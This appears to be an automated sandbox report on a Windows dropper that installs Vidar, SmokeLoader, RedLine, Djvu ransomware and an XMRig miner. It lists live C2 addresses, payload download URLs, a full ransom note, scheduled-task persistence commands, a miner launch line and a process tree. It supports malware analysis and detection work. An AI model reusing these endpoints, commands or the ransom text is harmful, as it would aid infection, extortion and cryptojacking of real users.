Analysis

  • max time kernel
    81s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    13-03-2022 09:00

General

  • Target

    f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe

  • Size

    3.7MB

  • MD5

    4bd56f1559ed71cbe361a5eb98872ec7

  • SHA1

    22eb1eac44baaac3bab313d35f7732aafb4e80a3

  • SHA256

    f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d

  • SHA512

    4928dd3e2b789ef14fea37c9fdae070a3516cf496d8b2cff8b90720c6de5315ad7df1a54564fa4986adeb1534300eaaa7ab998774a33c7e4fb8c2483c0c35e4c

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Build2

C2

45.142.213.135:30059

Extracted

Family

redline

Botnet

ruzkida

C2

185.11.73.55:22201

Attributes
  • auth_value

    000938fe0d697ca6a3b6cee46ba02ff3

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Danabot Key Exchange Request

    suricata: ET MALWARE Danabot Key Exchange Request

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 52 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 17 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 39 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 26 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 57 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 21 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
    "C:\Users\Admin\AppData\Local\Temp\f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3796
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_8.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4908
          • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_8.exe
            sahiba_8.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4748
            • C:\Users\Admin\AppData\Local\Temp\Chrome2.exe
              "C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:256
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
                7⤵
                  PID:1440
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
                    8⤵
                    • Creates scheduled task(s)
                    PID:4084
                • C:\Users\Admin\AppData\Roaming\system64.exe
                  "C:\Users\Admin\AppData\Roaming\system64.exe"
                  7⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3584
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
                    8⤵
                      PID:3136
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
                        9⤵
                        • Creates scheduled task(s)
                        PID:4128
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                      8⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      PID:776
                      • C:\Users\Admin\AppData\Roaming\system64.exe
                        "C:\Users\Admin\AppData\Roaming\system64.exe"
                        9⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Suspicious use of SetThreadContext
                        PID:6456
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
                          10⤵
                            PID:6352
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
                              11⤵
                              • Creates scheduled task(s)
                              PID:6652
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=80
                            10⤵
                              PID:464
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 464 -s 288
                                11⤵
                                • Program crash
                                PID:5804
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 464 -s 292
                                11⤵
                                • Program crash
                                PID:6692
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=80
                          8⤵
                            PID:1344
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 1344 -s 300
                              9⤵
                              • Program crash
                              PID:3560
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 1344 -s 304
                              9⤵
                              • Program crash
                              PID:3940
                      • C:\Users\Admin\AppData\Local\Temp\Install2.EXE
                        "C:\Users\Admin\AppData\Local\Temp\Install2.EXE"
                        6⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of WriteProcessMemory
                        PID:848
                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3464
                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                            8⤵
                            • Executes dropped EXE
                            PID:3336
                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1548
                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE
                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE
                          7⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          PID:2408
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSBBDB.tmp\Install.cmd" "
                            8⤵
                              PID:3164
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Df2r7
                                9⤵
                                • Adds Run key to start application
                                • Enumerates system info in registry
                                • Modifies registry class
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:3492
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8156846f8,0x7ff815684708,0x7ff815684718
                                  10⤵
                                    PID:412
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
                                    10⤵
                                      PID:3476
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
                                      10⤵
                                        PID:4600
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
                                        10⤵
                                          PID:824
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
                                          10⤵
                                            PID:3680
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
                                            10⤵
                                              PID:4484
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 /prefetch:8
                                              10⤵
                                                PID:2484
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
                                                10⤵
                                                  PID:2768
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
                                                  10⤵
                                                    PID:792
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:8
                                                    10⤵
                                                      PID:1500
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                      10⤵
                                                      • Drops file in Program Files directory
                                                      PID:2484
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6b0235460,0x7ff6b0235470,0x7ff6b0235480
                                                        11⤵
                                                          PID:2312
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:8
                                                        10⤵
                                                          PID:1512
                                                • C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:404
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sahiba_7.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4824
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sahiba_6.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4856
                                              • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_6.exe
                                                sahiba_6.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                PID:1912
                                                • C:\Users\Admin\Documents\q7qe_a0ikJj9r1Tt_dSq8ad5.exe
                                                  "C:\Users\Admin\Documents\q7qe_a0ikJj9r1Tt_dSq8ad5.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5332
                                                  • C:\Users\Admin\AppData\Local\Temp\bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Checks processor information in registry
                                                    PID:5368
                                                • C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe
                                                  "C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  PID:5320
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 624
                                                    7⤵
                                                    • Program crash
                                                    PID:3652
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 780
                                                    7⤵
                                                    • Program crash
                                                    PID:6560
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1292
                                                    7⤵
                                                    • Program crash
                                                    PID:6388
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1300
                                                    7⤵
                                                    • Program crash
                                                    PID:4844
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1344
                                                    7⤵
                                                    • Program crash
                                                    PID:6604
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1324
                                                    7⤵
                                                    • Program crash
                                                    PID:6208
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "RTLIv59rgr2ywOZxYERl3i7d.exe" /f & erase "C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe" & exit
                                                    7⤵
                                                      PID:4632
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im "RTLIv59rgr2ywOZxYERl3i7d.exe" /f
                                                        8⤵
                                                        • Kills process with taskkill
                                                        PID:1032
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1376
                                                      7⤵
                                                      • Program crash
                                                      PID:6200
                                                  • C:\Users\Admin\Documents\GGZuKAvlVgsiOJtG4ZvHBMf8.exe
                                                    "C:\Users\Admin\Documents\GGZuKAvlVgsiOJtG4ZvHBMf8.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Checks processor information in registry
                                                    PID:5312
                                                  • C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe
                                                    "C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5344
                                                    • C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe
                                                      C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5964
                                                  • C:\Users\Admin\Documents\OdWkSXo7oi5oqr8oooXgrl2n.exe
                                                    "C:\Users\Admin\Documents\OdWkSXo7oi5oqr8oooXgrl2n.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:5352
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 424
                                                      7⤵
                                                      • Program crash
                                                      PID:5272
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 440
                                                      7⤵
                                                      • Program crash
                                                      PID:3060
                                                  • C:\Users\Admin\Documents\70pVl2zvsfL6bROCn__7iQJN.exe
                                                    "C:\Users\Admin\Documents\70pVl2zvsfL6bROCn__7iQJN.exe"
                                                    6⤵
                                                      PID:5480
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                        7⤵
                                                          PID:2232
                                                      • C:\Users\Admin\Documents\ItMkYX_n_SCidLEm796l_vOZ.exe
                                                        "C:\Users\Admin\Documents\ItMkYX_n_SCidLEm796l_vOZ.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5472
                                                      • C:\Users\Admin\Documents\puFib_mN6HqGzK5uF14kFFxZ.exe
                                                        "C:\Users\Admin\Documents\puFib_mN6HqGzK5uF14kFFxZ.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        • Checks processor information in registry
                                                        PID:5424
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                          7⤵
                                                          • Blocklisted process makes network request
                                                          PID:5220
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 600
                                                          7⤵
                                                          • Program crash
                                                          PID:5740
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 968
                                                          7⤵
                                                          • Program crash
                                                          PID:4080
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 868
                                                          7⤵
                                                          • Program crash
                                                          PID:7040
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 968
                                                          7⤵
                                                          • Program crash
                                                          PID:5728
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                          7⤵
                                                          • Blocklisted process makes network request
                                                          • Drops file in Program Files directory
                                                          • Checks processor information in registry
                                                          • Modifies registry class
                                                          • Modifies system certificate store
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:5680
                                                      • C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe
                                                        "C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:5604
                                                        • C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe
                                                          "C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:2132
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 536
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Suspicious use of SetThreadContext
                                                            • Program crash
                                                            PID:5480
                                                      • C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe
                                                        "C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:5596
                                                        • C:\Windows\SysWOW64\cmd.exe
